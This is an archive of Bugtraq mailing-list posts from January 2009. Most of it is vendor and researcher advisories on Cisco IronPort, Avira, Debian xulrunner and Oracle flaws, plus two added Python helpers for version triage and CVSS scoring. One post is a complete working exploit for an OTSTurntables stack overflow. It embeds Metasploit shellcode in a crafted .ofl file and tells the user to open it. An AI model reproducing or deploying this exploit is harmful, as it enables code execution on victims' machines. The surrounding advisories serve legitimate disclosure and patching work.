    Access Vector - Network
    Access Complexity - Medium
    Authentication - None
    Confidentiality Impact - Partial
    Integrity Impact - Partial
    Availability Impact - None

CVSS Temporal Score - 4.8
    Exploitability - Functional
    Remediation Level - Official Fix
    Report Confidence - Confirmed

Impact
=====
PXE Encryption Privacy Vulnerabilities
+-------------------------------------

Successful exploitation of these vulnerabilities could allow an
attacker to obtain user credentials and view the contents of
intercepted secure e-mail messages, which could result in the
disclosure of sensitive information.

IronPort Encryption Appliance Administration Interface Vulnerabilities
+---------------------------------------------------------------------

Successful exploitation of these vulnerabilities could allow an
attacker to access user accounts on an IronPort Encryption Appliance
device, which could result in the modification of user preferences.

Software Versions and Fixes
==========================
When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to determine
exposure and a complete upgrade solution.

Workarounds
==========
There are no workarounds for the vulnerabilities that are described
in this advisory.

There are mitigations available to help prevent exploitation of the
PXE Encryption phishing-style vulnerability. Phishing attacks can be
greatly reduced if DomainKeys Identified Mail (DKIM) and Sender
Policy Framework (SPF) are implemented on IronPort e-mail gateways to
help ensure message integrity and source origin. Additionally, the
PXE Encryption solution contains an anti-phishing Secure Pass Phrase
feature to ensure that secure notification e-mail messages are valid.
This feature is enabled by recipients when configuring their PXE user
profile. Cisco has released a best practices document, available at
the following link, that describes several techniques to mitigate the
phishing-style attacks:

http://www.cisco.com/web/about/security/intelligence/bpiron.html

Obtaining Fixed Software
=======================
Cisco has released free software updates that address these
vulnerabilities. The affected products in this advisory are directly
supported by IronPort, and not via the Cisco TAC organization.
Customers should contact IronPort technical support at the link below
to obtain software fixes. IronPort technical support will assist
customers in determining the correct fixes and installation
procedures. Customers should direct all warranty questions to
IronPort technical support.

Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.

http://www.ironport.com/support/contact_support.html

Exploitation and Public Announcements
====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerabilities that are described in this advisory.

J.B. Snyder of Brintech reported a method for obtaining PXE
Encryption user credentials via a phishing-style attack to Cisco.

All other vulnerabilities were discovered by Cisco or reported by
customers.

Status of this Notice: FINAL
===========================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.

A stand-alone copy or paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.

Distribution
===========
This advisory is posted on Cisco's worldwide website at:

http://www.cisco.com/warp/public/707/cisco-sa-20090114-ironport.shtml

In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.

  * cust-security-announce@cisco.com
  * first-bulletins@lists.first.org
  * bugtraq@securityfocus.com
  * vulnwatch@vulnwatch.org
  * cisco@spot.colorado.edu
  * cisco-nsp@puck.nether.net
  * full-disclosure@lists.grok.org.uk
  * comp.dcom.sys.cisco@newsgate.cisco.com

Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.

Revision History
===============
+----------------------------------------------------------+
| Revision 1.0 | 2009-January-14 | Initial public release  |
+----------------------------------------------------------+

Cisco Security Procedures
========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at:

http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html

This includes instructions for press inquiries regarding Cisco security notices.
All Cisco security advisories are available at:

http://www.cisco.com/go/psirt
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.5 (SunOS)

iD8DBQFJbhoo86n/Gc8U/uARAjuxAJ4oLc1JjS7N9728Ueb6JB7Y2LVJtACfaSfA
A6WIz481vajHya3jIlp+/XcJ6
-----END PGP SIGNATURE-----
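
Added example, not part of the Cisco advisory and not Cisco or IronPort code: a check of version strings (as read from the appliance's About page) against the "Vulnerable Products" list above. The dotted numeric version format, the function names and the sample inventory are assumptions made for illustration.

```python
# Added example, not Cisco/IronPort code. The table transcribes the
# "Vulnerable Products" list of advisory cisco-sa-20090114-ironport.
from typing import Dict, Optional, Tuple

Version = Tuple[int, ...]

# Release branch -> first fixed version named by the advisory.
# None means the advisory names no fixed version inside that branch.
VULNERABLE_BRANCHES: Dict[Version, Optional[Version]] = {
    (6, 2, 1): (6, 2, 1, 1),
    (6, 2, 2): (6, 2, 2, 3),
    (6, 2, 4): (6, 2, 4, 1, 1),
    (6, 2, 5): None,
    (6, 2, 6): None,
    (6, 2, 7): (6, 2, 7, 7),
    (6, 3): (6, 3, 0, 4),
    (6, 5): (6, 5, 0, 2),
}


def parse_version(text: str) -> Version:
    """Parse a dotted numeric version string (assumed format, e.g. '6.2.4.1')."""
    parts = text.strip().split(".")
    if not all(part.isascii() and part.isdigit() for part in parts):
        raise ValueError(f"not a dotted numeric version: {text!r}")
    return tuple(int(part) for part in parts)


def find_branch(version: Version) -> Optional[Version]:
    """Return the longest listed branch that is a prefix of the version."""
    for length in (3, 2):
        if len(version) >= length and version[:length] in VULNERABLE_BRANCHES:
            return version[:length]
    return None


def classify(text: str) -> str:
    """Return 'affected', 'fixed' or 'unlisted' for one version string."""
    version = parse_version(text)
    branch = find_branch(version)
    if branch is None:
        return "unlisted"          # branch not mentioned in the advisory
    fixed = VULNERABLE_BRANCHES[branch]
    if fixed is None:
        return "affected"          # every version of this branch is listed
    # Pad with zeros so that '6.3' compares as 6.3.0.0 against 6.3.0.4.
    width = max(len(version), len(fixed))
    pad = lambda v: v + (0,) * (width - len(v))
    return "affected" if pad(version) < pad(fixed) else "fixed"


def triage(inventory: Dict[str, str]) -> Dict[str, str]:
    """Map each host name to the classification of its reported version."""
    return {host: classify(version) for host, version in inventory.items()}


# Constructed inventory: host names and versions are made up for the example.
SAMPLE_INVENTORY = {
    "iea-mail-01": "6.2.4.1",
    "iea-mail-02": "6.2.4.1.1",
    "postx-legacy": "6.2.5.3",
    "iea-dmz": "6.5.0.2",
}

if __name__ == "__main__":
    for host, status in triage(SAMPLE_INVENTORY).items():
        print(f"{host:14} {SAMPLE_INVENTORY[host]:10} {status}")
```

A result of "fixed" only means the version is not below the first fixed release named for its branch; the advisory directs customers to IronPort support to confirm which fixes apply.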
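
Added example, not part of the Cisco advisory: the CVSS version 2.0 base and temporal equations applied to a scoring block in the layout used under "Vulnerability Scoring Details", so the stated scores can be recomputed from the listed metric values. The weights are those of the CVSS v2 specification; the function names are chosen for this example.

```python
# Added example, not Cisco code: recompute CVSS v2 base and temporal scores
# from the metric values printed in the advisory's scoring blocks.
from decimal import Decimal, ROUND_HALF_UP

IMPACT_WEIGHTS = {"None": 0.0, "Partial": 0.275, "Complete": 0.660}
WEIGHTS = {
    "Access Vector": {"Local": 0.395, "Adjacent Network": 0.646, "Network": 1.0},
    "Access Complexity": {"High": 0.35, "Medium": 0.61, "Low": 0.71},
    "Authentication": {"Multiple": 0.45, "Single": 0.56, "None": 0.704},
    "Confidentiality Impact": IMPACT_WEIGHTS,
    "Integrity Impact": IMPACT_WEIGHTS,
    "Availability Impact": IMPACT_WEIGHTS,
    "Exploitability": {"Unproven": 0.85, "Proof-of-Concept": 0.90,
                       "Functional": 0.95, "High": 1.0, "Not Defined": 1.0},
    "Remediation Level": {"Official Fix": 0.87, "Temporary Fix": 0.90,
                          "Workaround": 0.95, "Unavailable": 1.0,
                          "Not Defined": 1.0},
    "Report Confidence": {"Unconfirmed": 0.90, "Uncorroborated": 0.95,
                          "Confirmed": 1.0, "Not Defined": 1.0},
}
TEMPORAL = ("Exploitability", "Remediation Level", "Report Confidence")
STATED = ("CVSS Base Score", "CVSS Temporal Score")

# One scoring block copied from the advisory text (IronPort bug 8062).
SAMPLE_BLOCK = """\
PXE Encryption Message Decryption Vulnerability - IronPort Bug 8062

CVSS Base Score - 7.1
    Access Vector - Network
    Access Complexity - Medium
    Authentication - None
    Confidentiality Impact - Complete
    Integrity Impact - None
    Availability Impact - None

CVSS Temporal Score - 5.9
    Exploitability - Functional
    Remediation Level - Official Fix
    Report Confidence - Confirmed
"""


def parse_block(text):
    """Split 'Name - Value' lines into metric values and stated scores."""
    metrics, stated = {}, {}
    for line in text.splitlines():
        key, sep, value = line.strip().partition(" - ")
        value = value.strip()
        if not sep:
            continue
        if key in STATED:
            stated[key] = float(value)
        elif key in WEIGHTS:
            if value not in WEIGHTS[key]:
                raise ValueError(f"unknown value {value!r} for {key}")
            metrics[key] = value
        # Any other line (such as the title) is ignored.
    return metrics, stated


def weight(metrics, name, default=None):
    value = metrics.get(name, default)
    if value is None:
        raise ValueError(f"missing metric: {name}")
    return WEIGHTS[name][value]


def round1(x):
    """round_to_1_decimal from the CVSS v2 equations."""
    return float(Decimal(str(x)).quantize(Decimal("0.1"), rounding=ROUND_HALF_UP))


def base_score(metrics):
    impact = 10.41 * (1 - (1 - weight(metrics, "Confidentiality Impact"))
                      * (1 - weight(metrics, "Integrity Impact"))
                      * (1 - weight(metrics, "Availability Impact")))
    if impact == 0:
        return 0.0                      # f(Impact) = 0 when there is no impact
    exploitability = 20 * (weight(metrics, "Access Vector")
                           * weight(metrics, "Access Complexity")
                           * weight(metrics, "Authentication"))
    return round1((0.6 * impact + 0.4 * exploitability - 1.5) * 1.176)


def temporal_score(base, metrics):
    score = base
    for name in TEMPORAL:               # absent temporal metrics: Not Defined
        score *= weight(metrics, name, "Not Defined")
    return round1(score)


def check_block(text):
    """Recompute both scores and compare them with the stated ones."""
    metrics, stated = parse_block(text)
    base = base_score(metrics)
    temporal = temporal_score(base, metrics)
    matches = (base == stated.get("CVSS Base Score")
               and temporal == stated.get("CVSS Temporal Score"))
    return {"base": base, "temporal": temporal, "matches": matches}


if __name__ == "__main__":
    print(check_block(SAMPLE_BLOCK))
```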

Date: 14 Jan 2009 17:14:39 -0000
From: crimson.loyd@gmail.com
To: bugtraq@securityfocus.com
Subject: OTSTurntables 1.00.027 (.ofl) Local Stack Overflow Exploit

#  OTSTurntables 1.00.027 (.ofl) Local Stack Overflow Exploit
#  Discovered & exploited bY suN8Hclf
#  crimson.loyd@gmail.com, blacksideofthesun.linuxsecured.net
#  Tested on: Windows XP SP2 Polish Full patched
#  
#  Only 274 bytes for shellcode. Wanna more, exploit SEH !!!
#
#  Thanks to Myo and to everyone who knows what hacking really is 
#  Not for money dude, only for fun !!!

print "====================================================================="
print " OTSTurntables 1.00.027 (.ofl) Local Stack Overflow Exploit"
print " bY suN8Hclf (crimson.loyd@gmail.com)"
print "====================================================================="

nops = "\x90" * 4
ret = "\x75\x52\x46";   # call ebx

# win32_exec -  EXITFUNC=seh CMDlc Size0 Encoder=PexFnstenvSub http://metasploit.com
shellcode = (
"\x29\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xc9"
"\x2c\xc9\x40\x83\xeb\xfc\xe2\xf4\x35\xc4\x8d\x40\xc9\x2c\x42\x05"
"\xf5\xa7\xb5\x45\xb1\x2d\x26\xcb\x86\x34\x42\x1f\xe9\x2d\x22\x09"
"\x42\x18\x42\x41\x27\x1d\x09\xd9\x65\xa8\x09\x34\xce\xed\x03\x4d"
"\xc8\xee\x22\xb4\xf2\x78\xed\x44\xbc\xc9\x42\x1f\xed\x2d\x22\x26"
"\x42\x20\x82\xcb\x96\x30\xc8\xab\x42\x30\x42\x41\x22\xa5\x95\x64"
"\xcd\xef\xf8\x80\xad\xa7\x89\x70\x4c\xec\xb1\x4c\x42\x6c\xc5\xcb"
"\xb9\x30\x64\xcb\xa1\x24\x22\x49\x42\xac\x79\x40\xc9\x2c\x42\x28"
"\xf5\x73\xf8\xb6\xa9\x7a\x40\xb8\x4a\xec\xb2\x10\xa1\xdc\x43\x44"
"\x96\x44\x51\xbe\x43\x22\x9e\xbf\x2e\x4f\xa8\x2c\xaa\x02\xac\x38"
"\xac\x2c\xc9\x40"
    )
num = 276 - 4 - 160
buff = "\x41" * num

exploit = nops + shellcode + buff + ret
try:
    out_file = open("open_me.ofl",'w')
    out_file.write(exploit)
    out_file.close()
    raw_input("\nNow open open_me.ofl file to exploit bug!\n")
except:
    print "WTF?"

Date: Wed, 14 Jan 2009 18:15:49 +0100
From: Thierry Zoller <Thierry@Zoller.lu>
To: NTBUGTRAQ <NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM>,
bugtraq <bugtraq@securityfocus.com>,
full-disclosure <full-disclosure@lists.grok.org.uk>,
<info@circl.etat.lu>, <vuln@secunia.com>, <cert@cert.org>,
<nvd@nist.gov>, <cve@mitre.org>
Subject: [TZO-2009-1] Avira Antivir - RAR - Division by Zero &  Null Pointer Dereference

______________________________________________________________________

     Avira - RAR - Division by Zero & Null Pointer Dereference
______________________________________________________________________

Reference     : [TZO-2009-1]-Avira Antivir
Location      : http://blog.zoller.lu/2009/01/advisory-tzo-2009-1-avira-antivir-rar.html
Products      : Avira AntiVir Free
                Avira AntiVir Premium
                Avira Premium Security Suite
                Avira AntiVir Professional
                Avira AntiVir for KEN! 4
                Avira AntiVir & AntiSpam for KEN! 4
                Avira WebProtector for KEN! 4
                Avira AntiVir SharePoint
                Avira AntiVir Virus Scan Adapter for SAP NetWeaver
                Avira AntiVir MailGate
                Avira MailGate Suite
                Avira AntiVir Exchange
                Avira AntiVir MIMEsweeper
                Avira AntiVir Domino
                Avira AntiVir WebGate
                Avira WebGate Suite
                Avira AntiVir ISA Server
                Avira AntiVir MIMEsweeper
                Avira AntiVir Mobile
                Avira SmallBusiness Suite
                Avira Business Bundle
                Avira AntiVir NetGate Bundle
                Avira AntiVir NetWork Bundle
                Avira AntiVir GateWay Bundle
                Avira AntiVir Campus (for Education)
                                
Vendors and Products using the Avira Engine :
Important : The impact of this flaw on those devices has not been
tested nor confirmed to exist, there is however reason to believe
that the flaw existed in these products as well.

http://www.avira.com/documents/utils/pdf/products/pi_system-integration_en.pdf

               AXIGEN Mail Server
               Clearswift Mimesweeper
               GeNUGate and GeNUGate Pro (optional addon)
               IQ.Suite                 

Vendor        : http://www.avira.de



I. Background
~~~~~~~~~~~~~
Avira is a leading worldwide provider of self-developed protection
solutions for professional and private use. The company belongs to
the pioneers in this sector with over twenty years experience.

The protection experts have numerous company locations throughout
Germany and cultivate partnerships in Europe, Asia and America.
Avira has more than 180 employees at their main office in Tettnang
near Lake Constance and is one of the largest employers in the
region. There are around 250 people employed worldwide whose
commitment is continually being confirmed by awards. A significant
contribution to protection is the Avira AntiVir Personal which is
being used by private users a million times over.

AV-Comparatives e.V. have chosen Avira AntiVir Premium as the
best anti-virus solution of 2008

II. Description
~~~~~~~~~~~~~~~
By manipulating certain fields inside a RAR archive an attacker
might trigger division by zero and null pointer exceptions. The
attack vector should be rated as remote as an attachment to an
e-mail is enough.

*Anybody else noticed that the amount of detail in most
advisories has become less than useful?*


III. Impact
~~~~~~~~~~~~~~~
In some cases the impact is a Denial of Service condition, in
others an invalid read size of 4 bytes, which again in some
cases leads to a null pointer dereference.

The RAR parser inside the module leads to various errors whose
exploitability index is rated "I don't have time for this now - so
let's say 'maybe'", also sometimes known as "I lack the time and/or
the skill to do so".


FAULTING_IP: 
aepack!module_get_api+20ed9
0131cad9 8b10            mov     edx,dword ptr [eax]

EXCEPTION_RECORD:  ffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 0131cad9 (aepack!module_get_api+0x00020ed9)
   ExceptionCode: c0000005 (Access violation)
   ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 00000000
   Parameter[1]: 00000268
Attempt to read from address 00000268

FAULTING_THREAD:  00000144
DEFAULT_BUCKET_ID:  INVALID_POINTER_READ

PROCESS_NAME:  avscan.exe
OVERLAPPED_MODULE: Address regions for 'AVREP' and 'rcimage.dll' overlap

READ_ADDRESS:  00000268 
BUGCHECK_STR:  APPLICATION_FAULT_INVALID_POINTER_READ_CORRUPT_MODULELIST_OVERLAPPED_MODULE
LAST_CONTROL_TRANSFER:  from 0131cb8c to 0131cad9

STACK_TEXT:  

0194f5fc 0131cb8c 0115bbfc 00000003 00000100 aepack!module_get_api+0x20ed9
0194f618 01319b96 0115bbfc 074cc4f4 00000002 aepack!module_get_api+0x20f8c
0194f654 0131a45a 00000010 01157160 00000001 aepack!module_get_api+0x1df96
0194f668 0131e7e0 000000d4 00f48ba8 011530d0 aepack!module_get_api+0x1e85a
0194f68c 01318c35 01157160 00000010 011530d0 aepack!module_get_api+0x22be0
00000000 00000000 00000000 00000000 00000000 aepack!module_get_api+0x1d035

FOLLOWUP_IP: 
aepack!module_get_api+20ed9
0131cad9 8b10            mov     edx,dword ptr [eax]

SYMBOL_NAME:  aepack!module_get_api+20ed9
MODULE_NAME: aepack
IMAGE_NAME:  aepack.dll
STACK_COMMAND:  ~2s ; kb

FAILURE_BUCKET_ID:  INVALID_POINTER_READ_c0000005_aepack.dll!module_get_api
BUCKET_ID:  APPLICATION_FAULT_INVALID_POINTER_READ_CORRUPT_MODULELIST_OVERLAPPED_MODULE_aepack!module_get_api+20ed9


IV. Disclosure Timeline
~~~~~~~~~~~~~~~~~~~~~~~~
The vulnerability notification policy I adhere to:
http://blog.zoller.lu/search/label/Vulnerability%20disclosure%20Policy

17/12/2008 : Sent notice to the correct mail address
security@avira. com

17/12/2008 : Avira acknowledges receipt

17/12/2008 : Avira sends details of the root cause on the same
day: "The crash occurs in a heavily corrupted, generated RAR
archive while extracting the contents of the 22nd file. We can't
give any file names as they are non-printable characters."

13/01/2009 : Avira notifies me that the issue was fixed with an
update that shipped with AVPack 8.1.3.5 on the 09/01/2009

14/01/2009 : Avira states that all products have been affected
except "Security Management Center" and the "Internet Update
Manager". "In principle this really means all products, except
products such as the Security Management Center or the Internet
Update Manager"

14/01/2009 : Release of this advisory


Thierry Zoller
http://blog.zoller.lu

Date: Wed, 14 Jan 2009 21:28:56 +0100
From: Steffen Joeris <white@debian.org>
Subject: [SECURITY] [DSA 1704-1] New xulrunner packages fix several vulnerabilities
To: bugtraq@securityfocus.com

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1704                    security@debian.org
http://www.debian.org/security/                           Steffen Joeris
January 14, 2009                      http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : xulrunner
Vulnerability  : several vulnerabilities
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2008-5500 CVE-2008-5503 CVE-2008-5506 CVE-2008-5507 CVE-2008-5508 CVE-2008-5511 CVE-2008-5512

Several remote vulnerabilities have been discovered in Xulrunner, a
runtime environment for XUL applications. The Common Vulnerabilities and
Exposures project identifies the following problems:

CVE-2008-5500

   Jesse Ruderman discovered that the layout engine is vulnerable to
   DoS attacks that might trigger memory corruption and an integer
   overflow. (MFSA 2008-60)

CVE-2008-5503

   Boris Zbarsky discovered that an information disclosure attack could
   be performed via XBL bindings. (MFSA 2008-61)

CVE-2008-5506

   Marius Schilder discovered that it is possible to obtain sensitive
   data via an XMLHttpRequest. (MFSA 2008-64)

CVE-2008-5507

   Chris Evans discovered that it is possible to obtain sensitive data
   via a JavaScript URL. (MFSA 2008-65)

CVE-2008-5508

   Chip Salzenberg discovered possible phishing attacks via URLs with
   leading whitespace or control characters. (MFSA 2008-66)

CVE-2008-5511

   It was discovered that it is possible to perform cross-site scripting
   attacks via an XBL binding to an "unloaded document." (MFSA 2008-68)

CVE-2008-5512

   It was discovered that it is possible to run arbitrary JavaScript
   with chrome privileges via unknown vectors. (MFSA 2008-68)

For the stable distribution (etch) these problems have been fixed in
version 1.8.0.15~pre080614i-0etch1.

For the testing distribution (lenny) and the unstable distribution (sid)
these problems have been fixed in version 1.9.0.5-1.

We recommend that you upgrade your xulrunner packages.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
-------------------------------

Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.


  These files will probably be moved into the stable distribution on
  its next update.

---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>

From - Wed Jan 14 16:42:17 2009
To: full-disclosure@lists.grok.org.uk, bugtraq@securityfocus.com
Cc: zdi-disclosures@3com.com
Subject: ZDI-09-003: Oracle Secure Backup exec_qr() Command Injection Vulnerability
From: zdi-disclosures@3com.com
Date: Wed, 14 Jan 2009 14:29:40 -0600
From - Wed Jan 14 16:52:18 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000058e9
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39181-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 75C52EC88D
for <lists@securityspace.com>; Wed, 14 Jan 2009 16:51:29 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 5152A237271; Wed, 14 Jan 2009 14:14:46 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 10809 invoked from network); 14 Jan 2009 20:06:31 -0000
X-EDSINT-Source-Ip: 205.142.126.149
To: full-disclosure@lists.grok.org.uk, bugtraq@securityfocus.com
Cc: zdi-disclosures@3com.com
Subject: ZDI-09-004: Oracle TimesTen evtdump Remote Format String Vulnerability
MIME-Version: 1.0
X-Mailer: Lotus Notes Release 7.0.3 September 26, 2007
Message-ID: <OFEDF225A6.227226D0-ON8525753E.00704BCC-8625753E.00709C2A@3com.com>
From: zdi-disclosures@3com.com
Date: Wed, 14 Jan 2009 14:30:01 -0600
X-MIMETrack: Serialize by Router on USUT001/US/3Com(Release 6.5.5FP2|October 23, 2006) at
 01/14/2009 12:30:04 PM,
Serialize complete at 01/14/2009 12:30:04 PM
Content-Type: text/plain;
charset="US-ASCII"
Content-Transfer-Encoding: base64
Status:   
From - Wed Jan 14 17:02:18 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000058ea
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39182-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 8E00BEC8E8
for <lists@securityspace.com>; Wed, 14 Jan 2009 17:00:36 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 027AE23724A; Wed, 14 Jan 2009 14:15:35 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 11449 invoked from network); 14 Jan 2009 20:27:08 -0000
X-Yahoo-Newman-Id: 9498.29225.bm@omp208.mail.re3.yahoo.com
X-Yahoo-Newman-Property: ymail-3
Subject: Oracle Secure Backup 10g Remote Code Execution
From: Joxean Koret <joxeankoret@yahoo.es>
To: bugtraq@securityfocus.com
Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="=-YhepHLVg9ODiz52nJhvx"
Date: Wed, 14 Jan 2009 21:51:47 +0100
Message-Id: <1231966307.18860.8.camel@joxean-desktop.etxea.com>
Mime-Version: 1.0
X-Mailer: Evolution 2.22.3.1 
Status:   


--=-YhepHLVg9ODiz52nJhvx
Content-Type: multipart/mixed; boundary="=-khnqrW9NU0VZCuXuDSRv"


--=-khnqrW9NU0VZCuXuDSRv
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable

Hi,

Happy new year! Attached goes an advisory for one of the recently fixed
Oracle vulnerabilities in the product Oracle Secure Backup.

Regards,
Joxean Koret



--=-khnqrW9NU0VZCuXuDSRv
Content-Disposition: attachment; filename=oracle-secure-backup-2009-01-14.txt
Content-Type: text/plain; name=oracle-secure-backup-2009-01-14.txt; charset=UTF-8
Content-Transfer-Encoding: base64
--=-khnqrW9NU0VZCuXuDSRv--

--=-YhepHLVg9ODiz52nJhvx
Content-Type: application/pgp-signature; name=signature.asc
Content-Description: This is a digitally signed message part

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQBJblBjU6rFMEYDrlERAhy3AJ4+eNpeftbfS0Im+TaEwSiJA3GTBgCfSohG
h1dFPwTx7ucfiIqE2iHmicA=iqhK
-----END PGP SIGNATURE-----

--=-YhepHLVg9ODiz52nJhvx--




From - Wed Jan 14 17:12:17 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000058eb
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39183-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 955A5EC9C2
for <lists@securityspace.com>; Wed, 14 Jan 2009 17:10:00 -0500 (EST)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 8DC1D2372AC; Wed, 14 Jan 2009 14:16:13 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 11509 invoked from network); 14 Jan 2009 20:28:27 -0000
X-Yahoo-Newman-Id: 829902.63290.bm@omp203.mail.re3.yahoo.com
X-Yahoo-Newman-Property: ymail-3
Subject: Oracle TimesTen Remote Format String
From: Joxean Koret <joxeankoret@yahoo.es>
To: Full Disclosure <full-disclosure@lists.grok.org.uk>,
bugtraq@securityfocus.com
Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="=-FHE+nIKLYvfBYNKSgYeb"
Date: Wed, 14 Jan 2009 21:53:05 +0100
Message-Id: <1231966385.18860.11.camel@joxean-desktop.etxea.com>
Mime-Version: 1.0
X-Mailer: Evolution 2.22.3.1 
Status:   


--=-FHE+nIKLYvfBYNKSgYeb
Content-Type: multipart/mixed; boundary="=-Y1d5wnjF15zP9y7LtuBL"


--=-Y1d5wnjF15zP9y7LtuBL
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable

Hi again,

Attached goes an advisory for the unique vulnerability in Oracle
TimesTen fixed in the Oracle Critical Patch Update January 2009.

Cheers!
Joxean Koret



--=-Y1d5wnjF15zP9y7LtuBL
Content-Disposition: attachment; filename=oracle-times-ten-2009-01-14.txt
Content-Transfer-Encoding: base64
Content-Type: text/plain; name=oracle-times-ten-2009-01-14.txt; charset=UTF-8
--=-Y1d5wnjF15zP9y7LtuBL--

--=-FHE+nIKLYvfBYNKSgYeb
Content-Type: application/pgp-signature; name=signature.asc
Content-Description: This is a digitally signed message part

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQBJblCxU6rFMEYDrlERAvfmAKCfnouWGL44+W+m6QhCXFyEVfe9oQCePOai
gBwnwN7WacqQnTmRlcUhk0g=SPQv
-----END PGP SIGNATURE-----

--=-FHE+nIKLYvfBYNKSgYeb--




From - Thu Jan 15 11:22:18 2009
X-Account-Key: account7
X-UIDL: 4909bb8c000059ed
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39186-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 7CDFCED8FA
for <lists@securityspace.com>; Thu, 15 Jan 2009 11:14:48 -0500 (EST)
